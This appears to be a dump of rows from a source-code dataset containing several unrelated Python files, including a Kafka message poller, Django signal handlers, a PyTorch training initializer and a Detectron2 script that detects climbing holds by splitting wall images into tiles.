libc = CDLL(util.find_library('c'))
# NOTE(review): loads by bare soname -- assumes libapron.so is on the
# dynamic loader's search path; confirm on target systems.
libapron = CDLL('libapron.so')
libgmp = CDLL(util.find_library('gmp'))
libmpfr = CDLL(util.find_library('mpfr'))
| 15.266667 | 41 | 0.676856 | """
C DLLs
======
:Author: Caterina Urban
"""
from ctypes import util, CDLL
libc = CDLL(util.find_library('c'))
libapron = CDLL('libapron.so')
libgmp = CDLL(util.find_library('gmp'))
libmpfr = CDLL(util.find_library('mpfr'))
| 0 | 0 | 0 |
5586bd40bf6dcfef172e32da01af9f4807ea5a33 | 371 | py | Python | alphatwirl/nanoaod/EventBuilderConfig.py | benkrikler/alphatwirl | cda7d12fec21291ea33af23234fc08be19430934 | [
"BSD-3-Clause"
] | null | null | null | alphatwirl/nanoaod/EventBuilderConfig.py | benkrikler/alphatwirl | cda7d12fec21291ea33af23234fc08be19430934 | [
"BSD-3-Clause"
] | 7 | 2018-02-26T10:32:26.000Z | 2018-03-19T12:27:12.000Z | alphatwirl/nanoaod/EventBuilderConfig.py | benkrikler/alphatwirl | cda7d12fec21291ea33af23234fc08be19430934 | [
"BSD-3-Clause"
] | null | null | null | ##__________________________________________________________________||
import collections

##__________________________________________________________________||
# Configuration record consumed by the NanoAOD event builder.
# ``base`` holds the underlying roottree.EventBuilderConfig;
# ``component`` identifies the sample component it was built for.
EventBuilderConfig = collections.namedtuple(
    'EventBuilderConfig',
    ['base', 'component']
)

##__________________________________________________________________||
| 28.538462 | 70 | 0.862534 | ##__________________________________________________________________||
import collections
##__________________________________________________________________||
EventBuilderConfig = collections.namedtuple(
'EventBuilderConfig',
'base component'
)
# base is for roottree.EventBuilderConfig
##__________________________________________________________________||
| 0 | 0 | 0 |
12cab3794b847a73861f7c5ad2a6f0f5f9050205 | 5,289 | py | Python | laksyt/entities/kafka/poller.py | laksyt/lks-persister | 42d9c795343e41b75d1c1915e835446e32c2fa40 | [
"MIT"
] | null | null | null | laksyt/entities/kafka/poller.py | laksyt/lks-persister | 42d9c795343e41b75d1c1915e835446e32c2fa40 | [
"MIT"
] | null | null | null | laksyt/entities/kafka/poller.py | laksyt/lks-persister | 42d9c795343e41b75d1c1915e835446e32c2fa40 | [
"MIT"
] | null | null | null | import asyncio
import logging
from dataclasses import dataclass
from typing import Optional
from kafka import KafkaConsumer
from kafka.errors import KafkaError
from laksyt.config.config import Config
from laksyt.entities.kafka.consumer import get_kafka_consumer
from laksyt.entities.kafka.schedule import Schedule, get_schedule
from laksyt.entities.report import HealthReport
logger = logging.getLogger(__name__)
@dataclass
class KafkaMessage:
    """One polled Kafka record: its partition offset and raw payload bytes."""

    offset: int
    raw_bytes: bytes
class KafkaPoller:
    """Wraps a KafkaConsumer in an endless polling loop that logs every
    failure it meets without ever breaking its stride.
    """

    def __init__(self, schedule: Schedule, kafka_consumer: KafkaConsumer):
        """Store the polling schedule and the consumer to poll."""
        self._schedule = schedule
        self._kafka_consumer = kafka_consumer

    def __aiter__(self):
        """Make poller instances asynchronously iterable."""
        return self.poll_continuously()

    async def poll_continuously(self):
        """Async generator yielding one batch per schedule interval."""
        while True:
            yield self._poll_once()
            await asyncio.sleep(self._schedule.delay)

    def _poll_once(self) -> Optional[list[HealthReport]]:
        """Run one synchronous poll and deserialize whatever it returned."""
        return self._deserialize_batch(self._do_poll())

    def _do_poll(self) -> Optional[list[KafkaMessage]]:
        """Poll the next bounded batch from Kafka (with a timeout), commit
        the consumer offsets, and return the flat list of messages.

        Returns None when polling or parsing fails; an empty list for an
        empty (but successful) poll.
        """
        try:
            polled = self._kafka_consumer.poll(
                timeout_ms=self._schedule.timeout * 1000,
                max_records=self._schedule.max_records
            )
        except KafkaError:
            logger.exception("Failed to poll for messages due to Kafka error")
            return None
        try:
            self._kafka_consumer.commit()
        except KafkaError:
            # A failed commit is logged but does not invalidate the batch.
            logger.exception("Failed to commit topic offset due to Kafka error")
        return self._parse_messages(polled)

    @staticmethod
    def _parse_messages(raw_messages: Optional[dict]) \
            -> Optional[list[KafkaMessage]]:
        """Flatten KafkaConsumer.poll() output into KafkaMessage objects.

        Returns None (after logging) when the structure cannot be parsed;
        an empty list when the batch holds no messages.
        """
        try:
            return [
                KafkaMessage(record.offset, record.value)
                for records in raw_messages.values()
                for record in records
            ]
        except AttributeError:
            logger.exception(
                f"Failed to parse Kafka messages; dropping: {raw_messages}"
            )
            return None

    def _deserialize_batch(self, batch: Optional[list[KafkaMessage]]) \
            -> Optional[list[HealthReport]]:
        """Deserialize a batch of Kafka messages and log its overall status."""
        if batch is None:
            # Polling errors were already reported where they happened.
            return None
        reports = []
        if not batch:
            # An empty batch is a normal outcome, not an error.
            logger.info("Received empty batch of reports")
            return reports
        for message in batch:
            report = self._deserialize_report(message)
            if report is not None:
                reports.append(report)
                logger.info(f"Received {report}")
        if not reports:
            logger.error(
                f"Failed to deserialize any of {len(batch)} Kafka messages"
                " in latest batch"
            )
        elif len(reports) != len(batch):
            logger.error(
                f"Failed to deserialize {len(batch) - len(reports)}"
                f" out of {len(batch)} Kafka messages in latest batch"
            )
        else:
            logger.info(f"Received batch of {len(reports)} reports")
        return reports

    @staticmethod
    def _deserialize_report(message: KafkaMessage) -> Optional[HealthReport]:
        """Deserialize one Kafka message into a HealthReport, or None."""
        offset, raw_bytes = message.offset, message.raw_bytes
        try:
            return HealthReport.deserialize(raw_bytes)
        except StopIteration:
            # Deserialization failure surfaces as StopIteration; its stack
            # trace adds nothing, so log a plain error and drop the message.
            logger.error(
                f"Failed to deserialize Kafka message [offset: {offset},"
                f" bytes: {raw_bytes}]; dropping"
            )
            return None
def get_kafka_poller(config: Config) -> KafkaPoller:
    """Build a KafkaPoller from the application config.

    Both the polling schedule and the KafkaConsumer are derived from the
    active profile's settings.
    """
    schedule = get_schedule(config)
    consumer = get_kafka_consumer(config)
    return KafkaPoller(schedule, consumer)
| 35.496644 | 80 | 0.633012 | import asyncio
import logging
from dataclasses import dataclass
from typing import Optional
from kafka import KafkaConsumer
from kafka.errors import KafkaError
from laksyt.config.config import Config
from laksyt.entities.kafka.consumer import get_kafka_consumer
from laksyt.entities.kafka.schedule import Schedule, get_schedule
from laksyt.entities.report import HealthReport
logger = logging.getLogger(__name__)
@dataclass
class KafkaMessage:
"""Represents the offset&bytes pair that is Kafka message"""
offset: int
raw_bytes: bytes
class KafkaPoller:
"""Wrapper around KafkaConsumer that continuously polls for messages and
reports any errors along the way without breaking its stride
"""
def __init__(
self,
schedule: Schedule,
kafka_consumer: KafkaConsumer
):
"""Uses polling schedule and KafkaConsumer"""
self._schedule = schedule
self._kafka_consumer = kafka_consumer
def __aiter__(self):
"""Makes poller instances asynchronously iterable"""
return self.poll_continuously()
async def poll_continuously(self):
"""Exposes continuous polling function as an asynchronous generator"""
while True:
yield self._poll_once()
await asyncio.sleep(self._schedule.delay)
def _poll_once(self) -> Optional[list[HealthReport]]:
"""Does one synchronous poll and deserializes polled messages, if any,
into HealthReports
"""
batch = self._do_poll()
return self._deserialize_batch(batch)
def _do_poll(self) -> Optional[list[KafkaMessage]]:
"""Polls next limited batch of reports from Kafka, with timeout, then
commits offsets and returns flat list of Kafka messages
If polling or parsing fails, None is returned. For empty batches, an
empty list is returned.
"""
try:
raw_messages = self._kafka_consumer.poll(
timeout_ms=self._schedule.timeout * 1000,
max_records=self._schedule.max_records
)
except KafkaError:
logger.exception("Failed to poll for messages due to Kafka error")
return None
try:
self._kafka_consumer.commit()
except KafkaError:
logger.exception("Failed to commit topic offset due to Kafka error")
return self._parse_messages(raw_messages)
@staticmethod
def _parse_messages(raw_messages: Optional[dict]) \
-> Optional[list[KafkaMessage]]:
"""Extracts flat list of Kafka messages from Kafka's output
If given raw data cannot be parsed, an error is logged, then None is
returned. If a batch has no messages, an empty list is returned.
"""
result = None
try:
result = [
KafkaMessage(message.offset, message.value)
for _, messages in raw_messages.items()
for message in messages
]
except AttributeError:
logger.exception(
f"Failed to parse Kafka messages; dropping: {raw_messages}"
)
return result
def _deserialize_batch(self, batch: Optional[list[KafkaMessage]]) \
-> Optional[list[HealthReport]]:
"""Deserializes Kafka offset/message pairs and reports batch status"""
if batch is None:
return None # polling errors reported where encountered
reports = []
if not batch:
logger.info("Received empty batch of reports") # valid case
return reports
for message in batch:
report = self._deserialize_report(message)
if report is not None:
reports.append(report)
logger.info(f"Received {report}")
if not reports:
logger.error(
f"Failed to deserialize any of {len(batch)} Kafka messages"
" in latest batch"
)
elif len(reports) != len(batch):
logger.error(
f"Failed to deserialize {len(batch) - len(reports)}"
f" out of {len(batch)} Kafka messages in latest batch"
)
else:
logger.info(f"Received batch of {len(reports)} reports")
return reports
@staticmethod
def _deserialize_report(message: KafkaMessage) -> Optional[HealthReport]:
"""Deserializes Kafka message to HealthReport"""
offset, raw_bytes = message.offset, message.raw_bytes
report = None
try:
report = HealthReport.deserialize(raw_bytes)
except StopIteration: # deserialization fails with this exception
logger.error( # stack trace is more or less useless, so just error
f"Failed to deserialize Kafka message [offset: {offset},"
f" bytes: {raw_bytes}]; dropping"
)
return report
def get_kafka_poller(config: Config) -> KafkaPoller:
"""Extracts and validates Kafka consumer parameters from the application
config file for the active profile, then constructs and returns the
poller object
"""
return KafkaPoller(
get_schedule(config),
get_kafka_consumer(config)
)
| 0 | 0 | 0 |
44344be341e2ef2e0c8c3f99fe68ccdecf79e2aa | 97 | py | Python | moviesdbapi/apps.py | sratatata/netguru-movies | 33337fc71ae7a2ba8fcb48f9b08820532b2a5e78 | [
"Unlicense"
] | 1 | 2019-03-03T22:25:24.000Z | 2019-03-03T22:25:24.000Z | moviesdbapi/apps.py | sratatata/netguru-movies | 33337fc71ae7a2ba8fcb48f9b08820532b2a5e78 | [
"Unlicense"
] | 13 | 2018-07-29T15:46:56.000Z | 2021-06-10T20:46:51.000Z | moviesdbapi/apps.py | sratatata/netguru-movies | 33337fc71ae7a2ba8fcb48f9b08820532b2a5e78 | [
"Unlicense"
] | 1 | 2020-05-09T16:01:01.000Z | 2020-05-09T16:01:01.000Z | from django.apps import AppConfig
| 16.166667 | 35 | 0.773196 | from django.apps import AppConfig
class MoviesdbapiConfig(AppConfig):
    """Django application configuration for the movies DB API app."""

    name = 'moviesdbapi'
| 0 | 39 | 23 |
4b6f8bee9fa9d7aac526c896109c40567beae7a8 | 2,794 | py | Python | mvrss/learners/initializer.py | valeoai/MVRSS | 368c2c892d8e6076c59cb21fd1056d472887990d | [
"Apache-2.0"
] | 24 | 2021-05-19T02:38:48.000Z | 2022-03-28T09:19:15.000Z | mvrss/learners/initializer.py | xuqinwang/MVRSS | 368c2c892d8e6076c59cb21fd1056d472887990d | [
"Apache-2.0"
] | 1 | 2021-07-17T01:54:53.000Z | 2021-09-13T10:34:06.000Z | mvrss/learners/initializer.py | xuqinwang/MVRSS | 368c2c892d8e6076c59cb21fd1056d472887990d | [
"Apache-2.0"
] | 6 | 2021-06-02T09:14:04.000Z | 2022-03-02T15:21:44.000Z | """Initializer class to prepare training"""
import json
from torch.utils.data import DataLoader
from mvrss.utils.paths import Paths
from mvrss.loaders.dataset import Carrada
from mvrss.loaders.dataloaders import SequenceCarradaDataset
class Initializer:
"""Class to prepare training model
PARAMETERS
----------
cfg: dict
Configuration file used for train/test
"""
def get_data(self):
"""Return parameters of the training"""
return self._structure_data()
| 35.367089 | 93 | 0.618826 | """Initializer class to prepare training"""
import json
from torch.utils.data import DataLoader
from mvrss.utils.paths import Paths
from mvrss.loaders.dataset import Carrada
from mvrss.loaders.dataloaders import SequenceCarradaDataset
class Initializer:
    """Class to prepare training model

    PARAMETERS
    ----------
    cfg: dict
        Configuration file used for train/test
    """

    def __init__(self, cfg):
        self.cfg = cfg
        # Project path registry (e.g. 'logs') provided by the Paths helper.
        self.paths = Paths().get()

    def _get_data(self):
        """Return the [train, validation, test] splits of the Carrada dataset."""
        data = Carrada()
        train = data.get('Train')
        val = data.get('Validation')
        test = data.get('Test')
        return [train, val, test]

    def _get_datasets(self):
        """Wrap each split in a SequenceCarradaDataset (same order as _get_data)."""
        data = self._get_data()
        trainset = SequenceCarradaDataset(data[0])
        valset = SequenceCarradaDataset(data[1])
        testset = SequenceCarradaDataset(data[2])
        return [trainset, valset, testset]

    def _get_dataloaders(self):
        """Build single-item-batch loaders; only the training split is shuffled."""
        trainset, valset, testset = self._get_datasets()
        trainloader = DataLoader(trainset, batch_size=1, shuffle=True, num_workers=0)
        valloader = DataLoader(valset, batch_size=1, shuffle=False, num_workers=0)
        testloader = DataLoader(testset, batch_size=1, shuffle=False, num_workers=0)
        return [trainloader, valloader, testloader]

    def _structure_data(self):
        """Assemble cfg, experiment paths and dataloaders into a single dict.

        Side effects: picks the first unused experiment version suffix,
        creates the ``results``/``boards`` directories, and writes the final
        config as ``config.json`` inside the experiment folder.
        """
        data = dict()
        dataloaders = self._get_dataloaders()
        # Experiment name encodes model, epoch count, learning rate and seed.
        name_exp = (self.cfg['model'] + '_' +
                    'e' + str(self.cfg['nb_epochs']) + '_' +
                    'lr' + str(self.cfg['lr']) + '_' +
                    's' + str(self.cfg['torch_seed']))
        self.cfg['name_exp'] = name_exp
        folder_path = self.paths['logs'] / self.cfg['dataset'] / self.cfg['model'] / name_exp
        temp_folder_name = folder_path.name + '_' + str(self.cfg['version'])
        temp_folder_path = folder_path.parent / temp_folder_name
        # Bump the version suffix until a folder name that does not exist yet
        # is found, so a rerun never overwrites a previous experiment.
        while temp_folder_path.exists():
            self.cfg['version'] += 1
            temp_folder_name = folder_path.name + '_' + str(self.cfg['version'])
            temp_folder_path = folder_path.parent / temp_folder_name
        folder_path = temp_folder_path
        self.paths['results'] = folder_path / 'results'
        self.paths['writer'] = folder_path / 'boards'
        self.paths['results'].mkdir(parents=True, exist_ok=True)
        self.paths['writer'].mkdir(parents=True, exist_ok=True)
        # Persist the (possibly version-bumped) config next to the outputs.
        config_path = folder_path / 'config.json'
        with open(config_path, 'w') as fp:
            json.dump(self.cfg, fp)
        data['cfg'] = self.cfg
        data['paths'] = self.paths
        data['dataloaders'] = dataloaders
        return data

    def get_data(self):
        """Return parameters of the training"""
        return self._structure_data()
| 2,152 | 0 | 135 |
f302fb50c34cca6ae19d61421d07a3441abffc5d | 1,858 | py | Python | pdc/apps/osbs/signals.py | tzhaoredhat/automation | a1867dc2d3591fdae1fa7f80d457c25f9705070e | [
"MIT"
] | 18 | 2015-12-15T17:56:18.000Z | 2021-04-10T13:49:48.000Z | pdc/apps/osbs/signals.py | tzhaoredhat/automation | a1867dc2d3591fdae1fa7f80d457c25f9705070e | [
"MIT"
] | 303 | 2015-11-18T07:37:06.000Z | 2021-05-26T12:34:01.000Z | pdc/apps/osbs/signals.py | tzhaoredhat/automation | a1867dc2d3591fdae1fa7f80d457c25f9705070e | [
"MIT"
] | 27 | 2015-11-19T20:33:54.000Z | 2021-03-25T08:15:28.000Z | #
# Copyright (c) 2015 Red Hat
# Licensed under The MIT License (MIT)
# http://opensource.org/licenses/MIT
#
import json
from django.dispatch import receiver
from django.db.models.signals import post_save
from . import models
from pdc.apps.component import signals as component_signals
from pdc.apps.component import models as component_models
@receiver(post_save, sender=component_models.ReleaseComponent)
def component_post_save_handler(sender, instance, **kwargs):
"""Create or delete OSBS record after component is saved.
"""
if instance.type.has_osbs and not hasattr(instance, 'osbs'):
models.OSBSRecord.objects.create(component=instance)
elif not instance.type.has_osbs and hasattr(instance, 'osbs'):
models.OSBSRecord.objects.get(component=instance).delete()
@receiver(post_save, sender=component_models.ReleaseComponentType)
def type_post_save_handler(sender, instance, **kwargs):
"""Create records for all components if their type now has OSBS.
If the has_osbs has been set to True, this call will take quite a lot of
time.
"""
if instance.has_osbs:
models.OSBSRecord.objects.bulk_create(
[models.OSBSRecord(component=c)
for c in instance.release_components.filter(osbs__isnull=True)]
)
else:
models.OSBSRecord.objects.filter(component__type=instance).delete()
@receiver(component_signals.releasecomponent_clone)
| 36.431373 | 79 | 0.738967 | #
# Copyright (c) 2015 Red Hat
# Licensed under The MIT License (MIT)
# http://opensource.org/licenses/MIT
#
import json
from django.dispatch import receiver
from django.db.models.signals import post_save
from . import models
from pdc.apps.component import signals as component_signals
from pdc.apps.component import models as component_models
@receiver(post_save, sender=component_models.ReleaseComponent)
def component_post_save_handler(sender, instance, **kwargs):
    """Keep the OSBS record in sync with the component's type after save."""
    has_record = hasattr(instance, 'osbs')
    wants_record = instance.type.has_osbs
    if wants_record and not has_record:
        models.OSBSRecord.objects.create(component=instance)
    elif has_record and not wants_record:
        models.OSBSRecord.objects.get(component=instance).delete()
@receiver(post_save, sender=component_models.ReleaseComponentType)
def type_post_save_handler(sender, instance, **kwargs):
    """Create records for all components if their type now has OSBS.

    If the has_osbs has been set to True, this call will take quite a lot of
    time.
    """
    if not instance.has_osbs:
        models.OSBSRecord.objects.filter(component__type=instance).delete()
        return
    # Only components that do not already have a record get a new one.
    missing = instance.release_components.filter(osbs__isnull=True)
    models.OSBSRecord.objects.bulk_create(
        [models.OSBSRecord(component=component) for component in missing]
    )
@receiver(component_signals.releasecomponent_clone)
def clone_osbs_record(sender, request, orig_component_pk, component, **kwargs):
    """Copy the original component's OSBS settings onto a freshly cloned one.

    No-op when the new component's type does not use OSBS. The creation is
    recorded in the request changeset ('null' -> exported record state).
    """
    if not component.type.has_osbs:
        return
    old_record = models.OSBSRecord.objects.get(component_id=orig_component_pk)
    component.osbs.autorebuild = old_record.autorebuild
    component.osbs.save()
    request.changeset.add('osbsrecord', component.osbs.pk,
                          'null', json.dumps(component.osbs.export()))
| 400 | 0 | 22 |
1cfe73b68360a104ad108ff8ef1c4c995a3eb057 | 241 | py | Python | components/icdc-sheepdog/tests/integration/datadictwithobjid/utils.py | CBIIT/icdc-docker | 5dc78b96a8d885b3fa427c55b9cc19f4771910fa | [
"Apache-2.0"
] | 2 | 2019-06-10T15:30:51.000Z | 2020-01-18T23:24:13.000Z | components/icdc-sheepdog/tests/utils.py | CBIIT/icdc-docker | 5dc78b96a8d885b3fa427c55b9cc19f4771910fa | [
"Apache-2.0"
] | null | null | null | components/icdc-sheepdog/tests/utils.py | CBIIT/icdc-docker | 5dc78b96a8d885b3fa427c55b9cc19f4771910fa | [
"Apache-2.0"
] | 1 | 2022-03-31T09:52:46.000Z | 2022-03-31T09:52:46.000Z | import os
def read_file(filename):
"""Read the contents of a file in the tests directory."""
root_dir = os.path.dirname(os.path.realpath(__file__))
with open(os.path.join(root_dir, filename), 'r') as f:
return f.read()
| 26.777778 | 61 | 0.66805 | import os
def read_file(filename):
    """Read the contents of a file in the tests directory."""
    tests_dir = os.path.dirname(os.path.realpath(__file__))
    target = os.path.join(tests_dir, filename)
    with open(target, 'r') as handle:
        return handle.read()
| 0 | 0 | 0 |
27cd2cb7ec28c5369648661a45650146484ef31f | 8,687 | py | Python | src/extract_holds.py | juangallostra/climbnet | 6ea48360b4501b40b24b3e6ff6182d1171d1ea9c | [
"Apache-2.0"
] | null | null | null | src/extract_holds.py | juangallostra/climbnet | 6ea48360b4501b40b24b3e6ff6182d1171d1ea9c | [
"Apache-2.0"
] | null | null | null | src/extract_holds.py | juangallostra/climbnet | 6ea48360b4501b40b24b3e6ff6182d1171d1ea9c | [
"Apache-2.0"
] | null | null | null | import os
import json
from itertools import product
import numpy as np
from PIL import Image
from os import walk
import cv2
from detectron2 import model_zoo
from detectron2.config import get_cfg
from detectron2.data import DatasetCatalog
from detectron2.data import MetadataCatalog
from detectron2.data.datasets import register_coco_instances
from detectron2.engine import DefaultPredictor
from detectron2.utils.visualizer import ColorMode
from detectron2.utils.visualizer import Visualizer
OUTPUT_IMAGE_EXTENSION = '.png'
INPUT_DIR = 'raw_images'
OUTPUT_DIR = 'processed_images'
# All this should better be refactored into a class
def segment_image_into_tiles(
filename,
tile_dimensions = (None, None),
dir_in = "",
dir_out = "",
ext = OUTPUT_IMAGE_EXTENSION,
save_tiles=True):
"""
Segments an image into tiles.
:param filename: The name of the image file to segment.
:type filename: str
:param dir_in: The directory containing the image file.
:type dir_in: str
:param dir_out: The directory to save the tiles to.
:type dir_out: str
:param ext: The extension of the image file.
:type ext: str
:param tile_dimensions: The dimensions of the tiles.
:type tile_dimensions: tuple
:param save_tiles: Whether or not to save the tiles.
:type save_tiles: bool
"""
tiles = dict()
name, _ = os.path.splitext(filename)
img = Image.open(os.path.join(dir_in, filename))
img_w, img_h = img.size
tile_w = tile_dimensions[0] if tile_dimensions[0] is not None else img_w
tile_h = tile_dimensions[1] if tile_dimensions[1] is not None else img_h
grid = product(range(0, img_h-img_h%tile_h, tile_h), range(0, img_w-img_w%tile_w, tile_w))
for i, j in grid:
box = (j, i, j+tile_w, i+tile_h)
out = os.path.join(dir_out, f'{name}_{i}_{j}{ext}')
tile = img.crop(box)
if save_tiles:
tile.save(out)
tiles[out] = tile
return tiles
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(description='Hold detection')
parser.add_argument('images_path', type=str, default='', help='The input wall image file')
parser.add_argument('model_path', type=str, default='', help='climbnet model weights')
parser.add_argument('tile_width', type=int, default=0, help='Tile width')
parser.add_argument('tile_height', type=int, default=0, help='Tile height')
parser.add_argument('combine_results', type=bool, default=False, help='Mix results of split detection and overall detection')
args = parser.parse_args()
f = []
for (dirpath, dirnames, filenames) in walk(args.images_path):
f.extend(filenames)
break
main(f, args.model_path, args.tile_width, args.tile_height, args.combine_results)
# sample run:
# > python .\extract_holds.py raw_images ..\model_weights\model_d2_R_50_FPN_3x.pth 0 600 False | 38.608889 | 137 | 0.657419 | import os
import json
from itertools import product
import numpy as np
from PIL import Image
from os import walk
import cv2
from detectron2 import model_zoo
from detectron2.config import get_cfg
from detectron2.data import DatasetCatalog
from detectron2.data import MetadataCatalog
from detectron2.data.datasets import register_coco_instances
from detectron2.engine import DefaultPredictor
from detectron2.utils.visualizer import ColorMode
from detectron2.utils.visualizer import Visualizer
OUTPUT_IMAGE_EXTENSION = '.png'
INPUT_DIR = 'raw_images'
OUTPUT_DIR = 'processed_images'
# All this should better be refactored into a class
def segment_image_into_tiles(
    filename,
    tile_dimensions = (None, None),
    dir_in = "",
    dir_out = "",
    ext = OUTPUT_IMAGE_EXTENSION,
    save_tiles=True):
    """
    Segments an image into tiles.
    :param filename: The name of the image file to segment.
    :type filename: str
    :param dir_in: The directory containing the image file.
    :type dir_in: str
    :param dir_out: The directory to save the tiles to.
    :type dir_out: str
    :param ext: The extension of the image file.
    :type ext: str
    :param tile_dimensions: The dimensions of the tiles. A ``None`` entry
        means "use the full image extent along that axis".
    :type tile_dimensions: tuple
    :param save_tiles: Whether or not to save the tiles.
    :type save_tiles: bool
    :return: Mapping from each tile's output path to the cropped PIL image.
    :rtype: dict
    """
    tiles = dict()
    name, _ = os.path.splitext(filename)
    img = Image.open(os.path.join(dir_in, filename))
    img_w, img_h = img.size
    tile_w = tile_dimensions[0] if tile_dimensions[0] is not None else img_w
    tile_h = tile_dimensions[1] if tile_dimensions[1] is not None else img_h
    # Only whole tiles are produced: the trailing strip of img_h % tile_h
    # (resp. img_w % tile_w) pixels is discarded. In particular, an image
    # smaller than one tile along an axis yields no tiles at all.
    grid = product(range(0, img_h-img_h%tile_h, tile_h), range(0, img_w-img_w%tile_w, tile_w))
    for i, j in grid:
        # PIL crop box is (left, upper, right, lower).
        box = (j, i, j+tile_w, i+tile_h)
        out = os.path.join(dir_out, f'{name}_{i}_{j}{ext}')
        tile = img.crop(box)
        if save_tiles:
            tile.save(out)
        tiles[out] = tile
    return tiles
def config_detector(model_path):
    """Configure a Detectron2 Mask R-CNN predictor for hold detection.

    :param model_path: Path to the trained climbnet model weights.
    :return: Tuple of (predictor, dataset metadata, device string).
    """
    # config values
    mask_path = "./mask.json"
    config_file = "COCO-InstanceSegmentation/mask_rcnn_R_50_FPN_3x.yaml"
    device = "cpu"
    dataset = "climb_dataset"
    # General detector setup
    register_coco_instances(dataset, {}, mask_path, "")
    cfg = get_cfg()
    cfg.merge_from_file(model_zoo.get_config_file(config_file))
    cfg.DATALOADER.NUM_WORKERS = 1
    cfg.MODEL.ROI_HEADS.NUM_CLASSES = 3  # 3 classes (hold, volume, downclimb)
    cfg.MODEL.WEIGHTS = os.path.join(model_path)
    cfg.MODEL.DEVICE = device
    cfg.DATASETS.TEST = (dataset,)
    # set the testing threshold for this model
    cfg.MODEL.ROI_HEADS.SCORE_THRESH_TEST = 0.75
    # setup inference
    predictor = DefaultPredictor(cfg)
    train_metadata = MetadataCatalog.get(dataset)
    # dataset catalog needs to exist so the polygon classes show up correctly
    DatasetCatalog.get(dataset)
    return predictor, train_metadata, device
def find_holds(tiles, predictor, train_metadata, device, save_tiles=True, show_results=False):
    """Run the detector on each tile and build a per-tile hold mask.

    :param tiles: Either a dict mapping path -> PIL image, or a list of
        image paths (which are then opened here).
    :param predictor: Detectron2 predictor from ``config_detector``.
    :param save_tiles: If truthy, write each mask image to its
        ``get_processed_name`` path.
    :return: Dict mapping tile path -> 2D numpy mask array.
    """
    masks = dict()
    # if tiles is a list of images, load them in memory
    if type(tiles) is not dict:
        tiles = {tile: Image.open(tile) for tile in tiles}
    for tile in tiles:
        # im = cv2.imread(image_path)
        im = cv2.cvtColor(np.array(tiles[tile]), cv2.COLOR_RGB2BGR)
        outputs = predictor(im)
        # get hold masks
        mask = outputs['instances'].get('pred_masks')
        mask = mask.to(device)
        _, h, w = mask.shape
        bin_mask = np.zeros((h, w))
        # build binary mask
        # NOTE(review): instance masks are summed, so pixels covered by
        # overlapping instances can exceed 1 — confirm that downstream
        # consumers only rely on zero/non-zero.
        for m in mask:
            bin_mask = np.add(bin_mask, np.array(m.long()))
        masks[tile] = bin_mask
        if save_tiles:
            p_name = get_processed_name(tile)
            cv2.imwrite(p_name, np.array(bin_mask), [cv2.IMWRITE_PNG_BILEVEL, 1])
            # cv2.imshow(p_name, np.array(bin_mask))
        if show_results:
            v = Visualizer(im[:, :, ::-1],
                           metadata=train_metadata,
                           # scale=0.75,
                           scale=0.3,
                           instance_mode=ColorMode.IMAGE_BW  # remove the colors of unsegmented pixels
                           )
            v = v.draw_instance_predictions(outputs["instances"].to(device))
            # cv2.imshow('climbnet', v.get_image()[:, :, ::-1])
            # cv2.waitKey(0)
    return masks
def get_processed_name(tile):
    """Map a tile image path to the path of its processed mask image.

    ``raw_images/foo.png`` becomes ``processed_images/foo_processed.png``;
    paths already under the output directory only get the suffix appended.
    """
    name, _ = os.path.splitext(tile)
    # Remap only the input-directory prefix (first occurrence). The previous
    # ``name.replace('raw', 'processed')`` also corrupted any filename that
    # merely contained "raw" (e.g. "drawing" -> "dprocesseding").
    name = name.replace(INPUT_DIR, OUTPUT_DIR, 1)
    return name + '_processed' + OUTPUT_IMAGE_EXTENSION
def concat_images_v(images_list):
    """Stack the given image files vertically onto one white RGB canvas.

    :param images_list: Iterable of image file paths, stacked top to bottom.
    :return: New PIL image of width max(widths) and height sum(heights).
    """
    images = [Image.open(i) for i in images_list]
    overall_height = sum([i.height for i in images])
    dst = Image.new('RGB', (max([i.width for i in images]), overall_height), (255, 255, 255))
    h = 0  # running vertical paste offset
    for im in images:
        dst.paste(im, (0, h))
        h += im.height
    return dst
def main(image_paths, model_path, tile_width, tile_height, combine_results):
    """Detect holds on each input image and write mask/contour outputs.

    :param image_paths: File names inside ``INPUT_DIR`` to process.
    :param model_path: Path to the climbnet model weights.
    :param tile_width: Tile width in pixels; 0 means "full image width".
    :param tile_height: Tile height in pixels; 0 means "full image height".
    :param combine_results: If true, also run detection on the whole image
        and superimpose that mask over the stitched per-tile masks.
    """
    # 0 is the CLI sentinel for "do not tile along this axis".
    if tile_width == 0:
        tile_width = None
    if tile_height == 0:
        tile_height = None
    predictor, train_metadata, device = config_detector(model_path)
    for image_path in image_paths:
        tiles = segment_image_into_tiles(image_path, (tile_width, tile_height), INPUT_DIR, OUTPUT_DIR)
        # NOTE(review): OUTPUT_DIR is passed where find_holds expects the
        # boolean ``save_tiles`` — a non-empty string is truthy, so masks are
        # saved; probably a leftover argument. Confirm and clean up.
        tile_masks = find_holds(tiles, predictor, train_metadata, device, OUTPUT_DIR)
        # Stitch the per-tile masks back into one full-size mask image.
        dst = concat_images_v([get_processed_name(tile) for tile in tile_masks])
        dst.save(os.path.join(OUTPUT_DIR, os.path.splitext(image_path)[0] + '_hold_masks.png'))
        if combine_results:
            # Run detection once on the untiled image as well.
            all_mask = find_holds([INPUT_DIR + '/' + image_path], predictor, train_metadata, device, OUTPUT_DIR)
            background = Image.open(os.path.join(OUTPUT_DIR, os.path.splitext(image_path)[0] + '_hold_masks.png'))
            img = Image.open(os.path.join(OUTPUT_DIR, os.path.splitext(image_path)[0] + '_processed.png'))
            # make black pixels transparent
            img = img.convert("RGBA")
            datas = img.getdata()
            new_data = []
            for item in datas:
                if item[0] == 0 and item[1] == 0 and item[2] == 0:
                    new_data.append((255, 255, 255, 0))
                else:
                    new_data.append(item)
            img.putdata(new_data)
            # Overlay the whole-image mask on the stitched tile masks.
            background.paste(img, (0, 0), img)
            background.save(os.path.join(OUTPUT_DIR, os.path.splitext(image_path)[0] + '_superimposed.png'),"PNG")
            poly_approx(os.path.join(OUTPUT_DIR, os.path.splitext(image_path)[0] + '_superimposed.png'), os.path.splitext(image_path)[0])
        else:
            poly_approx(os.path.join(OUTPUT_DIR, os.path.splitext(image_path)[0] + '_hold_masks.png'), os.path.splitext(image_path)[0])
def poly_approx(image, name):
    """Approximate each hold mask with a polygon and export the vertices.

    Writes ``extracted_data/<name>_holds.json`` with the polygon vertex
    lists and a ``*_contours.png`` visualisation next to the input image.

    :param image: Path to the (black-on-white) mask image.
    :param name: Base name used for the JSON output file.
    :return: ``{'holds': [[[x, y], ...], ...]}`` — one vertex list per hold.
    """
    img = cv2.imread(image)
